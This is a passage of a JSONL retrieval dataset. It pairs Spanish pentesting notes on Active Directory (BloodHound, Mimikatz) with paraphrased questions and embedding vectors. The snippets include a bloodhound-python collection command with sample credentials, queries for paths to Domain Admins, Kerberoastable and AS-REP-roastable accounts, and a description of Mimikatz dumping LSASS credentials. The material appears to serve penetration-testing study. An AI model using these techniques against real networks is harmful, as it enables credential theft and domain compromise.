neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "cual es una alternativa libre a BloodHound para investigar las relaciones de confianza entre dispositivos?", "v": [-0.19572, 0.15053, -0.06793, -0.09511, -0.02236, -0.03477, -0.06352, -0.03532, -0.06444, -0.04753, 0.01269, -0.04675, -0.07154, 0.07992, 0.02906, -0.10099, 0.04479, -0.07887, 0.06925, -0.11765, -0.01497, -0.10518, -0.07486, 0.00754, -0.02133, 0.00876, -0.00258, 0.12451, -0.00135, -0.00517, 0.00332, -0.11481, 0.10385, 0.15399, -0.16996, 0.0955, 0.00862, 0.15193, 0.07038, 0.02229, -0.04228, -0.14605, 0.06635, -0.07667, 0.06984, 0.04029, -0.13145, 0.01368, 0.07335, 0.11549, -0.14408, 0.05965, -0.15937, -0.0443, -0.01552, -0.00307, 0.11628, -0.0987, 0.05449, -0.01527, -0.1414, -0.12523, 0.1124, -0.01519, 0.06749, -0.00557, -0.02434, 0.0107, -0.08985, 0.05117, 0.08332, -0.02739, -0.13163, 0.04264, -0.11185, 0.04534, -0.01232, 0.04446, -0.0059, 0.01918, 0.03191, 0.01892, 0.0501, 0.0416, 0.03955, 0.00447, 0.1299, -0.00714, 0.02206, 0.13464, 0.05344, 0.04699, -0.07122, 0.07791, -0.04243, -0.12916, -0.02029, 0.03023, 0.06523, 0.01811, 0.09463, 0.02627, -0.12678, 0.09284, -0.05552, -0.04737, -0.06897, -0.03158, -0.00443, -0.05396, 0.03982, 0.06767, -0.073, 0.02263, -0.10764, -0.05949, 0.08639, 0.06574, 0.03011, -0.01762, -0.0972, -0.04918, 0.04315, 0.00346, -0.06362, -0.02265, -0.00369, -0.01911, 0.01887, 0.03266, 0.04708, 0.01994, -0.11363, -0.0422, -0.04953, -0.04216, 0.02152, 0.00045, 0.00333, -0.0979, 0.07534, 0.02516, 0.09736, -0.02617, 0.06112, -0.00905, -0.01365, -0.02328, 0.05359, -0.00224, 0.00786, 0.02306, -0.06282, 0.11996, -0.04899, 0.01258, -0.02394, -0.01802, -0.04614, 0.04611, 0.03925, -0.05523, 0.00269, 0.05046, 0.01447, 0.05823, -0.02734, -0.02001, -0.04051, -0.04803, 0.01241, 0.02878, 0.00042, -0.01686, 0.02043, -0.05661, 0.0816, -0.10052, 0.00939, -0.04674, 0.01676, 0.05924, -0.08641, 0.03858, 0.04271, -0.05044, -0.03909, -0.00036, 0.02052, -0.01455, -0.00045, 0.03533, 0.02261, -0.0187, 0.02362, -0.02056, 0.02126, -0.06017, -0.0351, -0.00328, -0.00179, -0.05877, -7e-05, 0.01814, 0.02043, -0.00646, -0.05668, 0.04745, -0.03761, 0.00707, 0.0124, 0.01387, 0.06757, -0.02817, -0.03715, -0.00113, -0.01031, -0.02752, -0.03959, -0.00081, 0.07064, 0.04622, 0.03886, -0.02718, -0.05297, 0.04173, -0.0075, 0.01076, -0.00453, -0.0621, 0.00633, 0.02158, -0.05856, -0.04031, 0.03663, 0.07654, 0.07636, -0.07966, 0.00243, -0.02747, 0.08334, 0.07092, -0.03091, -0.03865, -0.0524, -0.02416, -0.06649, 0.00379, -0.04276, -0.09258, -0.00562, 0.0742, 0.06954, 0.0017, 0.03012, -0.01491]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "que programa sirve para recopilar credenciales de usuario y contraseΓ±a en una red local?", "v": [0.01724, 0.00906, -0.16466, -0.25427, 0.09587, -0.15322, -0.0022, -0.06604, 0.02168, -0.19098, -0.04808, -0.05143, -0.04451, -0.16471, 0.06187, 0.00898, 0.05916, 0.05898, 0.14156, 0.07123, 0.00962, -0.04105, -0.03347, 0.00687, 0.03825, 0.04609, 0.09286, -0.09464, 0.04089, -0.00381, 0.06909, -0.02293, -0.03388, -0.04114, -0.03609, 0.14892, 0.02027, 0.05469, -0.06848, 0.13519, 0.05281, 0.07956, -0.1298, 0.13373, 0.01623, 0.06981, 0.03173, 0.0053, -0.01671, 0.0177, -0.08393, -0.13784, -0.11343, -0.11113, 0.03897, -0.06014, 0.06045, -0.12558, -0.06082, 0.0219, -0.08777, -0.0265, 0.04879, 0.08165, -0.04333, -0.09095, 0.07399, -0.00504, -0.06595, 0.07044, -0.00962, 0.00289, -0.02562, -0.02714, 0.01208, 0.01297, 0.00761, -0.0235, 0.10445, -0.00884, -0.02003, -0.04327, 0.05337, -0.00127, -0.07926, -0.02143, 0.12351, -0.08659, 0.04584, -0.04096, 0.09846, 0.00331, 0.04451, 0.04086, 0.06255, -0.06371, 0.0834, 0.00538, -0.04465, 0.01162, 0.01861, -0.05272, -0.03956, 0.12669, -0.0117, 0.04833, 0.02268, 0.02431, 0.05409, -0.03048, 0.09929, -0.00403, -0.04117, -0.03769, -0.02855, 0.001, -0.01192, -0.06907, 0.05668, 0.00238, -0.05259, -0.04817, -0.03147, -0.04785, 0.043, 0.04375, -0.07302, 0.06573, -0.06788, -0.02852, -0.04872, 0.0176, 0.00392, 0.01503, -0.03364, -0.04193, -0.03384, -0.13859, -0.10169, 0.00589, 0.01486, 0.03982, -0.02946, -0.06452, 0.04295, 0.06639, 0.04484, -0.06564, -0.01744, 0.0304, 0.00704, 0.01277, -0.02923, 0.00528, -0.03861, 0.04705, 0.04791, -0.05443, -0.04262, 0.09082, -0.03917, -0.05977, 0.03053, -0.00171, -0.07252, -0.12374, 0.03724, 0.03416, 0.1125, 0.04593, 0.02262, 0.08645, -0.04121, -0.07923, -0.0278, -0.03, 0.02576, -0.10928, 0.00014, -0.07984, -0.0116, -0.02416, 0.04423, 0.02924, 0.00101, -0.07338, -0.00992, 0.0194, 0.00013, -0.06681, 0.00465, -0.06168, 0.01142, 0.05889, 0.01896, -0.01346, 0.00642, 0.0006, 0.00927, -0.06426, -0.07562, 0.02637, -0.01987, 0.01958, 0.05516, 0.11205, -0.05576, -0.00979, 0.03622, 0.09128, 0.00344, -0.01379, 0.03212, -0.01046, -0.06893, -0.11334, 0.02788, 0.05472, -0.03074, -0.01058, 0.07772, -0.00316, -0.0074, 0.10245, -0.03373, -0.06611, 0.03104, -0.01408, 0.03334, 0.03974, 0.00437, 0.00678, -0.05013, -0.00739, 0.0608, -0.03418, -0.02056, 0.03635, -0.03577, -0.11689, -0.07335, 0.06674, -0.03648, -0.10963, -0.06428, -0.00579, -0.09168, 0.01895, 0.04532, -0.02032, -0.0796, 0.00274, 0.05879, -0.03136, 0.05755, 0.03583]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "con que puedo extraer informaciΓ³n de usuarios si ya tengo acceso a la mΓ‘quina?", "v": [-0.02005, 0.17112, -0.14661, -0.16571, -0.02411, -0.04075, -0.11563, -0.03293, -0.12849, -0.08179, -0.14201, -0.04604, 0.08183, -0.03983, 0.0802, -0.07196, 0.12215, 0.02338, 0.09503, 0.02011, 0.03946, 0.00863, -0.14611, -0.01025, -0.05767, 0.10454, -0.08344, -0.09019, -0.15271, 0.06333, 0.00034, -0.04304, 0.00661, -0.00128, 0.02345, -0.04929, 0.03831, 0.09444, 0.1042, 0.04126, 0.10951, -0.00987, -0.0838, -0.02619, 0.12318, 0.0242, 0.02248, -0.00466, 0.03453, 0.01355, -0.05569, -0.09192, -0.07296, -0.0137, -0.12719, -0.12403, 0.22528, -0.01704, 0.06577, -0.01747, 0.04145, 0.02558, -0.04217, 0.10087, -0.05292, -0.00371, 0.05953, 0.03079, -0.04693, 0.06348, -0.0711, 0.00919, 0.03853, -0.07973, 0.05195, -0.02015, 0.04345, -0.03626, 0.07015, 0.03509, -0.08408, 0.00171, -0.04156, -0.12773, -0.07906, -0.0442, 0.07577, -0.06897, 0.043, -0.15134, 0.13176, 0.08029, 0.02512, -0.04146, 0.06518, -0.00347, 0.01438, 0.00616, -0.05463, -0.00727, 0.06133, 0.07895, 0.04193, 0.15482, -0.02715, 0.01416, 0.07902, -0.07893, -0.0021, -0.08241, -0.01148, -0.01262, -0.0606, -0.0854, -0.08075, 0.02286, -0.08613, 0.00399, -0.09797, 0.01123, -0.00515, -0.03818, 0.11474, -0.13026, 0.03856, -0.03896, 0.01823, 0.05171, -0.09758, -0.09499, 0.01357, 0.03278, -0.00308, 0.02168, 0.01277, -0.01498, -0.02689, -0.08469, 0.00739, -0.02278, 0.00277, 0.01322, -0.13213, -0.02312, 0.00648, -0.06808, -0.01215, -0.05157, -0.05551, -0.11887, 0.06375, -0.05572, 0.03422, 0.0548, -0.04796, 0.074, -0.02269, -0.00506, -0.05823, -0.00547, -0.10718, 0.00148, -0.06124, -0.00877, -0.07779, 0.05341, -0.04239, -0.03149, -0.01034, -0.03065, -0.09587, -0.00108, 0.0471, -0.02612, 0.01097, 0.00622, -0.0247, -0.00382, 0.00241, -0.00105, -0.03851, -0.00994, -0.06582, -0.09649, -0.09172, -0.03153, 0.01735, -0.01644, -0.00246, -0.00294, 0.0238, 0.04674, 0.04499, 0.01757, 0.06453, -0.03132, -0.02323, 0.07705, 0.05564, -0.03829, -0.02108, 0.07967, -0.04344, 0.02155, -0.0315, 0.04804, 0.01319, -0.03956, -0.03058, -0.0363, 0.11708, 0.0205, 0.02703, -0.07355, -0.07664, 0.0066, 0.05837, 0.00299, 0.01311, -0.05735, -0.02186, 0.00443, 0.04486, 0.0661, 0.05454, -0.02424, 0.02351, 0.02874, 0.023, 0.00128, 0.00422, 0.02437, -0.01652, -0.01507, -0.00817, 0.00784, 0.00451, -0.00292, -0.04805, -0.04463, -0.02342, 0.03893, 0.04592, -0.0323, -0.00447, 0.00737, -0.04773, -0.01885, -0.10223, -0.05921, -0.00178, -0.0143, 0.03338, 0.00494, 0.00707, 0.08506]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "hay alguna herramienta para mapear las relaciones entre cuentas de usuario en un dominio?", "v": [0.02384, 0.14167, -0.02297, -0.22357, -0.08979, -0.14456, 0.0129, -0.01426, -0.12732, -0.0228, -0.06893, -0.08907, 0.03073, -0.07571, 0.01097, -0.00945, 0.21648, 0.05157, -0.00494, -0.11302, 0.02221, -0.05299, -0.05818, 0.03586, -0.14188, -0.06515, 0.08079, -0.12908, -0.11408, 0.15488, 0.03621, 0.00505, 0.02189, -0.01728, -0.08211, -0.08149, 0.05528, 0.01335, 0.05205, 0.04131, 0.0184, -0.05112, -0.07955, 0.07381, -0.0334, 0.06465, -0.13621, 0.01844, 0.07975, 0.00246, -0.03577, -0.17514, -0.19768, 0.03936, -0.00815, -0.07797, 0.18036, -0.06555, 0.04036, -0.09241, -0.13291, -0.08454, 0.0353, 0.01819, -0.05997, -0.04377, 0.05909, -0.00676, -0.0739, 0.11113, -0.0187, 0.06914, -0.00544, 0.02792, 0.06682, -0.0807, 0.14005, -0.03199, -0.04549, -0.03616, 0.03107, -0.06571, -0.07205, 0.02281, -0.08543, -0.06989, 0.02104, -0.05342, 0.10461, -0.00185, 0.00435, 0.05425, -0.09324, -0.02105, -0.0119, -0.03387, -0.02664, -0.09447, -0.07427, -0.06946, 0.14021, 0.09537, -0.12177, 0.04439, -0.0454, 0.05107, 0.00289, -0.05463, 0.00658, 0.03322, 0.07828, 0.017, -0.06219, -0.03037, -0.07262, 0.12478, -0.04453, -0.00014, 0.01964, -0.09641, -0.0259, -0.01626, -0.00163, 0.02981, -0.05378, -0.01547, -0.01518, 0.05536, 0.01062, -0.08562, -0.06631, -0.07205, -0.05117, -0.00084, 0.0456, 0.0439, -0.02406, -0.03848, -0.0284, -0.02658, -0.05063, 0.0376, -0.1031, -0.11811, -0.00062, 0.00929, 0.03656, -0.05472, -0.05172, 0.02505, 0.02412, -0.0903, -0.07438, 0.03093, -0.00067, 0.05978, -0.0814, 0.00928, -0.04073, -0.01839, -0.02164, -0.02909, 0.02329, 0.03926, 0.09835, -0.08164, 0.00153, 0.04485, 0.04614, 0.02774, -0.0068, 0.07642, 0.05115, 0.00215, -0.00775, -0.06647, 0.00501, -0.01708, -0.04355, -0.03047, 0.00848, -0.08871, 0.04454, -0.00144, -0.01772, 0.02343, 0.00528, -0.00033, 0.00046, 0.01921, -0.0132, 0.05797, 0.00516, -0.02936, 0.05815, -0.03506, 0.04644, 0.03324, -0.02154, 0.00308, 0.01242, -0.02674, 0.00012, 0.04149, -0.01606, 0.06883, -0.02182, -0.02569, 0.01375, -0.03496, 0.01875, -0.0321, -0.01926, -0.06687, -0.014, -0.02714, -0.00649, 0.02381, 0.02728, -0.02121, -0.01501, 0.01409, 0.03158, -0.05201, 0.05469, 0.03983, 0.02795, -0.06103, -0.02011, -0.00235, 0.0231, -0.02494, 0.00901, -0.01772, 0.01246, -0.02553, 0.07925, -0.08065, 0.03449, -0.02951, -0.03119, 0.01861, 0.06754, -0.01978, -0.11924, -0.02196, -0.00518, -0.00752, -0.07356, -0.07728, 0.04112, -0.01076, 0.05084, -0.0045, 0.00535, 0.0195]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "ΒΏQuΓ© herramienta me ayuda a encontrar usuarios con derechos de Administrador de dominio?", "v": [-0.13143, 0.11568, 0.0173, -0.25653, 0.01095, -0.01183, -0.01708, -0.06266, -0.17399, -0.01003, -0.0651, -0.16141, 0.00927, -0.21041, 0.01201, -0.13355, 0.21727, -0.06251, 0.01307, -0.0418, 0.02103, 0.01, -0.0417, 0.05372, -0.09064, -0.10997, 0.06898, -0.10432, -0.04688, 0.1105, 0.05887, -0.09515, -0.04048, 0.02608, -0.06487, -0.01871, 0.08928, 0.07707, 0.0823, 0.12577, 0.01725, -0.05551, -0.01986, 0.00333, -0.03629, 0.06987, -0.0753, -0.07342, 0.04629, -0.03948, -0.0505, -0.1702, -0.10599, -0.015, 0.04559, -0.08584, 0.15181, -0.15414, 0.01917, -0.12504, -0.17438, -0.05514, -0.01327, 0.12106, -0.04028, -0.07616, 0.0565, -0.05487, -0.06953, 0.11662, 0.03801, 0.01855, 0.02518, -0.02952, 0.01017, -0.02098, 0.0372, -0.04885, 0.11067, -0.06661, 0.03691, 0.08694, -0.04418, -0.06866, -0.08574, -0.12831, -0.03116, -0.07922, 0.02867, -0.06065, 0.00617, 0.03176, -0.01353, -0.05008, -0.06218, 0.00088, 0.01396, -0.1243, -0.04253, -0.02797, 0.09942, 0.03077, -0.06365, 0.01195, 0.05714, 0.01111, -0.03111, -0.08348, -0.11255, 0.01513, 0.05139, -0.01527, -0.03068, 0.06935, -0.00954, 0.09502, -0.05939, -0.04048, -0.00106, -0.08462, 0.03888, -0.01428, 0.01915, -0.05792, 0.07355, 0.0159, 0.08013, 0.06692, -0.04426, -0.12737, -0.01314, -0.10298, -0.01972, -0.03308, 0.00322, 0.00508, 0.00799, -0.02716, -0.00389, 0.01687, -0.02378, -0.01051, -0.07393, -0.08914, -0.01764, -0.06634, 0.05451, -0.01181, -0.00476, -0.05083, 0.01163, -0.04681, 0.03897, -0.01313, 0.00825, 0.04519, -0.06072, -0.0293, -0.09867, -0.05971, -0.05433, -0.04373, 0.00377, -0.01389, 0.01573, -0.03357, 0.05414, 0.01868, 0.01196, 0.01535, -0.00472, 0.0337, 0.06293, 0.00064, -0.03197, -0.07778, -0.02738, -0.01609, -0.01218, -0.05019, -0.01187, -0.04804, -0.01006, 0.0751, 0.0132, -0.00196, 0.01035, -0.03613, -0.01858, 0.07129, 0.01593, 0.02265, 0.01374, -0.05395, 0.01572, 0.00609, -0.01996, -0.00501, -0.01865, -0.0159, -0.01043, -0.03342, 0.00021, -0.01127, -0.02813, 0.02908, -0.00641, -0.02869, 0.02921, -0.04737, -0.03243, 0.04791, 0.01732, 0.00578, -0.06047, -0.04374, -0.00677, 0.04766, -0.04236, -0.10095, -0.04712, -0.00384, 0.00608, 0.00603, 0.05436, -0.00763, 0.03362, 0.00437, -0.0357, -0.01272, 0.02132, -0.04036, 0.03332, -0.01989, 0.00214, -0.05346, 0.0425, 0.00491, 0.00594, 0.01588, -0.03555, 0.04103, 0.0874, 0.03611, -0.02962, -0.02474, 0.01122, -0.02405, -0.07662, 0.00632, 0.0149, -0.00379, 0.0579, -0.02726, -0.01474, 0.02089]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "ΒΏCon quΓ© puedo identificar cuentas susceptibles al Kerberoasting?", "v": [0.01673, 0.16502, 0.0418, 0.08289, 0.15138, -0.1451, 0.09665, 0.06746, -0.17179, -0.1123, -0.09613, 0.03897, -0.00974, 0.00141, 0.08422, 0.03896, -0.05912, -0.00467, 0.04746, -0.04595, 0.07079, -0.10256, -0.04508, 0.01645, -0.12115, -0.00852, 0.03828, -0.01825, -0.03071, 0.08089, -0.07251, -0.00455, 0.01548, 0.04941, 0.0049, 0.09403, -0.15828, 0.14829, 0.09347, 0.09109, 0.10784, 0.06462, 0.00481, 0.044, 0.0819, -0.07225, -0.22376, 0.01119, -0.05462, 0.05774, 0.04379, -0.03625, -0.17972, 0.01287, -0.08285, -0.06948, 0.05069, 0.0317, 0.02171, -0.01915, 0.00326, -0.01961, 0.02894, 0.0438, -0.06915, -0.1086, 0.07771, 0.06764, -0.01328, -0.03356, -0.0536, 0.00167, 0.04832, 0.01432, 0.05047, 0.00441, 0.05608, -0.00968, -0.04933, -0.08201, -0.03299, -0.04578, 0.01554, 0.0727, 0.01939, -0.12241, -0.04125, -0.07154, 0.03867, -0.10602, 0.0241, -0.07693, -0.03271, 0.01044, -0.03255, 0.09642, -0.08185, 0.07051, -0.04966, 0.04105, -0.1042, -0.00256, -0.12745, 0.07805, -0.07327, 0.10817, -0.03177, -0.07626, 0.0286, -0.1549, -0.01241, 0.00502, -0.16931, -0.06397, 0.00921, 0.10764, -0.08514, 0.05629, 0.10385, 0.04757, -0.00516, 0.00042, 0.04171, 0.03218, -0.00874, -0.07282, -0.03902, 0.11627, -0.02317, 0.01097, -0.07088, 0.00999, -0.01764, 0.0092, 0.02681, 0.08831, -0.0838, -0.06439, 0.02654, 0.03591, -0.02456, 0.00914, -0.02236, -0.07905, -0.0071, -0.02522, 0.02796, -0.0354, -0.09473, 0.00045, 0.00436, -0.03894, -0.11153, 0.07067, -0.03088, -0.01142, 0.02619, -0.04545, -0.02694, -0.02941, -0.0386, -0.01403, 0.0635, -0.02075, 0.08079, -0.05575, 0.01159, 0.01662, 0.05155, 0.01958, -0.05469, 0.04937, 0.03137, -0.0214, 0.03965, -0.11095, 0.01474, -0.04421, 0.00209, -0.02004, -0.02311, -0.02661, 0.04782, -0.06316, 0.02246, -0.04435, 0.0493, -0.07256, 0.02893, 0.0428, 0.02612, -0.00339, -0.07894, 0.01586, 0.0056, -0.05029, 0.01152, 0.01296, -0.00656, -0.02847, -0.0785, 0.03678, -0.01579, 0.02845, 0.06945, 0.06888, -0.0532, 0.08438, -0.03387, -0.02639, 0.04388, -0.1012, 0.10552, -0.04973, -0.05017, 0.02321, 0.01956, -0.03646, 0.0028, 0.07236, 0.03754, -0.0092, 0.09847, 0.00607, 0.06967, 0.07063, 0.03271, -0.06238, 0.04937, 0.03988, 0.02398, 0.03603, -0.0698, -0.01996, 0.02429, -0.00913, 0.01399, -0.0291, -0.01087, -0.00156, 0.03804, 0.04539, 0.05579, -0.01857, -0.02731, -0.02375, -0.05799, 0.027, -0.04882, -0.03867, -0.00253, 0.00806, 0.00746, -0.04614, 0.06645, -0.0138]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "ΒΏCuΓ‘l es una tΓ©cnica para detectar usuarios roqueables mediante AS-REP?", "v": [-0.20878, -0.08558, -0.06026, -0.1642, 0.16138, -0.02945, 0.00561, -0.00713, -0.00711, -0.03457, -0.15488, -0.06068, -0.04646, -0.0278, 0.33097, -0.05384, -0.10788, 0.08531, 0.09967, 0.01732, 0.01953, -0.22384, -0.17626, 0.05994, 0.13241, 0.00916, 0.02527, -0.0722, -0.00376, -0.09254, 0.06215, -0.01674, -0.04058, 0.00272, -0.14069, -0.07906, 0.06005, -0.09706, 0.06483, 0.10728, 0.0344, -0.06184, -0.17594, 0.0227, 0.11481, 0.05751, -0.05077, -0.01349, -0.04008, 0.1514, -0.01765, 0.11288, -0.13456, -0.00818, -0.0825, -0.06957, 0.18342, 0.02515, 0.05535, -0.08905, -0.06567, -0.01146, 0.01081, 0.02107, 0.09601, -0.10574, -0.00059, -0.05786, -0.01698, -0.08107, 0.0022, -0.06453, -0.01177, 0.02273, -0.02128, 0.06941, 0.03872, 0.01055, 0.08437, -0.10443, -0.03372, 0.01668, -0.0252, -0.00447, -0.06143, 0.01652, 0.09027, -0.03363, 0.06604, -0.16105, 0.04226, 0.03341, 0.05897, 0.01339, 0.0435, -0.03062, 0.06915, 0.03185, -0.03401, -0.0227, -0.0299, -0.0321, 0.01734, 0.05838, 0.04182, 0.01214, 0.02192, -0.09367, -0.01203, -0.05784, -0.0441, 0.02358, -0.06738, -0.06582, -0.01614, 0.00917, 0.04237, -0.14104, -0.06493, 0.0313, -0.04248, 0.05547, 0.00993, -0.02366, 0.0946, -0.03752, 0.01512, 0.05378, -0.02512, 0.04374, 0.02372, -0.00217, -0.06102, -0.02295, -0.0587, 0.03678, 0.0413, -0.09209, -0.05586, 0.00036, -0.00391, 0.077, -0.09803, 0.04916, 0.04096, 0.00229, 0.03398, -0.03748, -0.06348, -0.00406, 0.052, 0.05442, -0.08918, 0.04668, -0.06743, -0.01186, 0.02806, -0.04608, -0.10269, 0.04395, -0.03864, 0.00359, 0.02558, -0.03397, -0.00744, 0.00471, -0.00977, 0.02596, 0.07708, 0.02405, -0.04091, -0.02585, 0.013, -0.02912, 0.00822, -0.0005, -0.00757, -0.00199, 0.01098, -0.04368, -0.04443, -0.03653, 0.0245, -0.00152, -0.01164, -0.03126, -0.00624, -0.00294, 0.03322, 0.02056, 0.01778, 0.00681, 0.02355, 0.02485, 0.00339, -0.0731, 0.00911, -0.01171, -0.03837, 0.04561, 0.0183, 0.02805, -0.02402, 0.02363, 0.03188, -0.0186, 0.01164, -0.05568, 0.02806, -0.01473, 0.04512, -0.00286, 0.05323, -0.01887, -0.01067, 0.00175, -0.01368, 0.0309, -0.02706, 0.05396, 0.00832, 0.00736, 0.07524, 0.03113, -0.02298, 0.00932, -0.02267, 0.00506, 0.01546, 0.01404, 0.04898, -0.01383, -0.00257, -0.01239, -0.01415, -0.02814, 0.00654, 0.00104, 0.00985, 0.0215, 0.00399, 0.05332, -0.02228, 0.00722, -0.0108, 0.02526, -0.06044, 0.00119, -0.03374, -0.04981, -0.01139, 0.01814, 0.01532, -0.02769, 0.01699, -0.03447]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Mimikatz\n\n> Un **.exe que corre DENTRO de la vΓ­ctima Windows** (no en Kali). Lee la memoria de **LSASS** y vuelca credenciales. En `tu carpeta`.", "indexar": "que herramienta sirve para leer las credenciales desde el proceso LSASS", "v": [-0.14009, -0.05363, -0.09795, -0.12502, 0.05689, -0.17164, -0.0633, -0.06161, -0.07575, 0.04392, -0.17225, -0.0097, -0.04965, -0.13078, 0.18736, 0.04995, 0.02096, -0.05474, -0.05107, 0.04118, -0.04477, -0.04244, -0.2439, -0.04057, -0.01557, 0.04576, 0.08486, -0.12271, -0.07988, 0.10286, -0.14842, 0.09385, -0.02669, -0.01485, -0.02066, -0.07616, -0.20141, 0.13987, -0.02719, 0.20309, 0.05216, 0.13526, -0.00094, 0.00882, 0.05229, -0.11133, -0.00282, 0.02553, -0.08463, 0.01484, -0.03911, -0.13195, -0.07569, 0.02955, -0.0246, -0.0437, 0.12339, -0.12182, -0.04024, -0.13934, -0.1202, -0.0276, -0.04121, -0.07399, 0.03617, -0.08252, 0.04311, -0.06884, -0.00412, 0.06116, -0.11478, 0.02908, 0.02256, -0.00474, -0.07793, -0.06928, 0.0443, 0.10112, 0.10149, -0.04424, 0.13896, -0.03877, -0.06732, 0.04546, 0.04733, 0.0039, -0.0008, -0.01386, 0.05237, 0.0033, -0.04316, 0.16213, 0.00463, 0.02091, 0.03166, 0.01845, 0.04048, -0.04174, 0.0224, -0.00417, 0.09796, -0.14525, -0.0081, 0.06075, -0.05797, 0.02745, 0.01436, 0.06999, -0.07615, -0.04461, 0.0518, 0.03316, -0.0141, 0.00978, 0.00609, 0.09854, -0.01451, -0.06698, 0.03281, -0.01821, 0.0853, -0.00611, -0.02902, -0.03992, 0.00732, -0.00307, -0.08408, -0.02122, -0.02074, -0.07071, -0.02971, -0.01296, -0.07906, 0.05283, 0.02898, -0.08863, -0.01994, -0.08818, -0.02517, -0.041, 0.03741, 0.04792, -0.02326, -0.0924, -0.00768, -0.02246, 0.03874, -0.06384, 0.07525, -0.07228, 0.0126, -0.01975, 0.00665, -0.01089, -0.06923, -0.0371, -0.01239, 0.02234, -0.06919, 0.03046, -0.04331, -0.01352, 0.08306, 0.03933, -0.00992, -0.07069, 0.03245, 0.00342, 0.04086, 0.05218, 0.03394, -0.04937, 0.03287, -0.01692, 0.03933, -0.02837, -0.00839, -0.00262, -0.02106, -0.04673, 0.01265, -0.01478, -0.03674, 0.00626, 0.01291, 0.00489, -0.0278, -0.02826, -0.02511, -0.00358, -0.01123, 0.03274, -0.0101, -0.06951, 0.01095, 0.04353, -0.00593, -0.07377, 0.02054, -0.00563, -0.10868, 0.007, 0.03182, -0.01518, -0.00726, 0.07791, 0.05883, 0.00653, -0.03131, 0.02872, 0.00029, -0.04983, 0.05942, 0.01034, -0.02719, -0.03951, -0.03406, 0.05599, -0.04831, 0.02156, 0.04211, -0.02045, 0.05604, -0.00857, -0.01497, -0.03237, -0.01888, 0.01859, -0.01877, 0.00671, 0.02372, 0.02662, 0.0119, -0.00626, 0.01474, -0.0406, 0.03546, 0.00332, -0.04149, -0.02841, 0.01296, 0.01468, -0.01158, -0.01449, -0.01507, -0.02874, -0.00505, -0.00824, 0.02242, -0.04956, -0.05191, -0.03133, 0.04555, -0.02256, -0.0015, -0.01973]} -{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Mimikatz\n\n> Un **.exe que corre DENTRO de la vΓ­ctima Windows** (no en Kali). Lee la memoria de **LSASS** y vuelca credenciales. En `tu carpeta`.", "indexar": "con que programa puedo extraer usuarios y contraseΓ±as de la memoria de Windows", "v": [0.1135, 0.07999, -0.06354, -0.22988, -0.01605, -0.01584, -0.03879, -0.07787, -0.0876, -0.14574, 0.00436, 0.00203, 0.02228, -0.11223, -0.05487, -0.01743, 0.14805, 0.02137, 0.0648, 0.06473, -0.00818, -0.05069, -0.05091, 0.07032, -0.04654, 0.03647, -0.01201, 0.00944, -0.0228, 0.03391, 0.00937, -0.01767, 0.04246, -0.07362, 0.01609, 0.13727, 0.02773, 0.10468, 0.06581, 0.09295, 0.11878, 0.11694, -0.08612, 0.08261, 0.07873, 0.00169, 0.03785, -0.02371, 0.12872, -0.07543, -0.0642, -0.05798, -0.00399, -0.04825, 0.06207, -0.10926, 0.08342, -0.05989, -0.035, 0.03299, -0.04102, 0.1292, 0.03652, 0.10172, 0.00519, -0.02426, 0.12687, 0.04104, -0.08386, 0.21823, -0.08351, 0.01736, 0.05058, -0.01882, 0.04343, 0.05784, -0.00925, -0.05764, 0.04597, 0.04684, -0.09685, -0.0106, 0.06126, -0.06761, -0.08236, -0.00378, 0.01026, -0.02771, 0.04183, -0.10187, 0.10068, 0.00771, -0.01162, 0.15949, 0.08326, 